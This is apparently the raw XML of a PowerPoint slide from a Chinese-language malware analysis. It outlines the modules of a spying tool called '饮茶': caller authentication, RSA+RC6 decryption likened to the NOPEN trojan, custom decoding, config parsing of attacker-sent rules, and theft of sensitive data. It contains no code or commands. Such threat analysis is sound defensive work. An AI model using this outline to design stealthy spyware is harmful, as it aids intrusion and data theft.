              <a:chExt cx="3689878" cy="3509884"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Freeform 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9142449" y="1647067"/>
                <a:ext cx="1846490" cy="1444090"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 501 w 1059"/>
                  <a:gd name="T1" fmla="*/ 800 h 828"/>
                  <a:gd name="T2" fmla="*/ 745 w 1059"/>
                  <a:gd name="T3" fmla="*/ 801 h 828"/>
                  <a:gd name="T4" fmla="*/ 993 w 1059"/>
                  <a:gd name="T5" fmla="*/ 314 h 828"/>
                  <a:gd name="T6" fmla="*/ 506 w 1059"/>
                  <a:gd name="T7" fmla="*/ 66 h 828"/>
                  <a:gd name="T8" fmla="*/ 310 w 1059"/>
                  <a:gd name="T9" fmla="*/ 211 h 828"/>
                  <a:gd name="T10" fmla="*/ 0 w 1059"/>
                  <a:gd name="T11" fmla="*/ 637 h 828"/>
                  <a:gd name="T12" fmla="*/ 501 w 1059"/>
                  <a:gd name="T13" fmla="*/ 800 h 828"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1059" h="828">
                    <a:moveTo>
                      <a:pt x="501" y="800"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="578" y="826"/>
                      <a:pt x="663" y="828"/>
                      <a:pt x="745" y="801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="948" y="735"/>
                      <a:pt x="1059" y="517"/>
                      <a:pt x="993" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="927" y="111"/>
                      <a:pt x="709" y="0"/>
                      <a:pt x="506" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="424" y="93"/>
                      <a:pt x="356" y="145"/>
                      <a:pt x="310" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="637"/>
                      <a:pt x="0" y="637"/>
                      <a:pt x="0" y="637"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="501" y="800"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="25400" dir="18660000">
                  <a:prstClr val="black">
                    <a:alpha val="35000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="Freeform 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9141413" y="2758065"/>
                <a:ext cx="1438918" cy="1690288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 826"/>
                  <a:gd name="T1" fmla="*/ 526 h 970"/>
                  <a:gd name="T2" fmla="*/ 75 w 826"/>
                  <a:gd name="T3" fmla="*/ 759 h 970"/>
                  <a:gd name="T4" fmla="*/ 615 w 826"/>
                  <a:gd name="T5" fmla="*/ 844 h 970"/>
                  <a:gd name="T6" fmla="*/ 700 w 826"/>
                  <a:gd name="T7" fmla="*/ 304 h 970"/>
                  <a:gd name="T8" fmla="*/ 502 w 826"/>
                  <a:gd name="T9" fmla="*/ 163 h 970"/>
                  <a:gd name="T10" fmla="*/ 1 w 826"/>
                  <a:gd name="T11" fmla="*/ 0 h 970"/>
                  <a:gd name="T12" fmla="*/ 1 w 826"/>
                  <a:gd name="T13" fmla="*/ 526 h 970"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="826" h="970">
                    <a:moveTo>
                      <a:pt x="1" y="526"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="607"/>
                      <a:pt x="24" y="689"/>
                      <a:pt x="75" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="931"/>
                      <a:pt x="442" y="970"/>
                      <a:pt x="615" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="788" y="719"/>
                      <a:pt x="826" y="477"/>
                      <a:pt x="700" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="649" y="234"/>
                      <a:pt x="579" y="186"/>
                      <a:pt x="502" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1" y="526"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="25400" dir="18660000">
                  <a:prstClr val="black">
                    <a:alpha val="35000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Freeform 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7706633" y="2758065"/>
                <a:ext cx="1439952" cy="1690288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 324 w 826"/>
                  <a:gd name="T1" fmla="*/ 163 h 970"/>
                  <a:gd name="T2" fmla="*/ 126 w 826"/>
                  <a:gd name="T3" fmla="*/ 304 h 970"/>
                  <a:gd name="T4" fmla="*/ 211 w 826"/>
                  <a:gd name="T5" fmla="*/ 844 h 970"/>
                  <a:gd name="T6" fmla="*/ 751 w 826"/>
                  <a:gd name="T7" fmla="*/ 759 h 970"/>
                  <a:gd name="T8" fmla="*/ 824 w 826"/>
                  <a:gd name="T9" fmla="*/ 526 h 970"/>
                  <a:gd name="T10" fmla="*/ 824 w 826"/>
                  <a:gd name="T11" fmla="*/ 0 h 970"/>
                  <a:gd name="T12" fmla="*/ 324 w 826"/>
                  <a:gd name="T13" fmla="*/ 163 h 970"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="826" h="970">
                    <a:moveTo>
                      <a:pt x="324" y="163"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="247" y="186"/>
                      <a:pt x="177" y="234"/>
                      <a:pt x="126" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="477"/>
                      <a:pt x="38" y="719"/>
                      <a:pt x="211" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="384" y="970"/>
                      <a:pt x="625" y="931"/>
                      <a:pt x="751" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="802" y="689"/>
                      <a:pt x="826" y="607"/>
                      <a:pt x="824" y="526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="824" y="0"/>
                      <a:pt x="824" y="0"/>
                      <a:pt x="824" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="324" y="163"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="25400" dir="18660000">
                  <a:prstClr val="black">
                    <a:alpha val="35000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Freeform 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7299061" y="1647067"/>
                <a:ext cx="1843388" cy="1444090"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 749 w 1058"/>
                  <a:gd name="T1" fmla="*/ 211 h 828"/>
                  <a:gd name="T2" fmla="*/ 553 w 1058"/>
                  <a:gd name="T3" fmla="*/ 66 h 828"/>
                  <a:gd name="T4" fmla="*/ 66 w 1058"/>
                  <a:gd name="T5" fmla="*/ 314 h 828"/>
                  <a:gd name="T6" fmla="*/ 314 w 1058"/>
                  <a:gd name="T7" fmla="*/ 801 h 828"/>
                  <a:gd name="T8" fmla="*/ 558 w 1058"/>
                  <a:gd name="T9" fmla="*/ 800 h 828"/>
                  <a:gd name="T10" fmla="*/ 1058 w 1058"/>
                  <a:gd name="T11" fmla="*/ 637 h 828"/>
                  <a:gd name="T12" fmla="*/ 749 w 1058"/>
                  <a:gd name="T13" fmla="*/ 211 h 828"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1058" h="828">
                    <a:moveTo>
                      <a:pt x="749" y="211"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="702" y="145"/>
                      <a:pt x="635" y="93"/>
                      <a:pt x="553" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="350" y="0"/>
                      <a:pt x="132" y="111"/>
                      <a:pt x="66" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="517"/>
                      <a:pt x="111" y="735"/>
                      <a:pt x="314" y="801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="828"/>
                      <a:pt x="481" y="826"/>
                      <a:pt x="558" y="800"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1058" y="637"/>
                      <a:pt x="1058" y="637"/>
                      <a:pt x="1058" y="637"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="749" y="211"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="25400" dir="18660000">
                  <a:prstClr val="black">
                    <a:alpha val="35000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Freeform 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8470056" y="938469"/>
                <a:ext cx="1346852" cy="1819596"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 696 w 773"/>
                  <a:gd name="T1" fmla="*/ 618 h 1044"/>
                  <a:gd name="T2" fmla="*/ 773 w 773"/>
                  <a:gd name="T3" fmla="*/ 387 h 1044"/>
                  <a:gd name="T4" fmla="*/ 386 w 773"/>
                  <a:gd name="T5" fmla="*/ 0 h 1044"/>
                  <a:gd name="T6" fmla="*/ 0 w 773"/>
                  <a:gd name="T7" fmla="*/ 387 h 1044"/>
                  <a:gd name="T8" fmla="*/ 77 w 773"/>
                  <a:gd name="T9" fmla="*/ 618 h 1044"/>
                  <a:gd name="T10" fmla="*/ 386 w 773"/>
                  <a:gd name="T11" fmla="*/ 1044 h 1044"/>
                  <a:gd name="T12" fmla="*/ 696 w 773"/>
                  <a:gd name="T13" fmla="*/ 618 h 1044"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="773" h="1044">
                    <a:moveTo>
                      <a:pt x="696" y="618"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="744" y="553"/>
                      <a:pt x="773" y="473"/>
                      <a:pt x="773" y="387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="773" y="173"/>
                      <a:pt x="600" y="0"/>
                      <a:pt x="386" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="0"/>
                      <a:pt x="0" y="173"/>
                      <a:pt x="0" y="387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="473"/>
                      <a:pt x="29" y="553"/>
                      <a:pt x="77" y="618"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1044"/>
                      <a:pt x="386" y="1044"/>
                      <a:pt x="386" y="1044"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="696" y="618"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="25400" dir="18660000">
                  <a:prstClr val="black">
                    <a:alpha val="35000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773930" y="1121410"/>
            <a:ext cx="3618230" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验证模块（authenticate）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8150225" y="2877185"/>
            <a:ext cx="2978785" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密模块（decrypt）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7602855" y="4845050"/>
            <a:ext cx="2936240" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码模块（decode）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024505" y="4883150"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>配置模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626995" y="2922270"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>间谍模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6603365" y="1581785"/>
            <a:ext cx="5192395" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用前验证其调用者（父进程）的身份，随后进行解密、解码以加载其他恶意软件模块。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7999730" y="3382645"/>
            <a:ext cx="3905250" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通用模块，被其他模块调用对指定文件进行解密，采用了与NOPEN远控木马类似的RSA+RC6加密算法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7602855" y="5407660"/>
            <a:ext cx="4192905" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通用模块，可以被其他模块调用对指定文件进行解码，但采用了自编码算法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422275" y="5443220"/>
            <a:ext cx="6096000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>读取攻击者远程投送的xml格式配置文件中的指令和匹配规则，并生成二进制配置文件，从而由“监视模块”和“间谍模块”调用后在受害主机上查找相关内容。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156845" y="3382645"/>
            <a:ext cx="3722370" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>按照攻击者下发的指令和规则从受害主机上提取相应的敏感信息并输出到指定位置。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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="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“饮茶”是功能先进，隐蔽性强的强大网络武器工具</a:t>
            </a:r>
            <a:endPar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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926465" y="1343660"/>
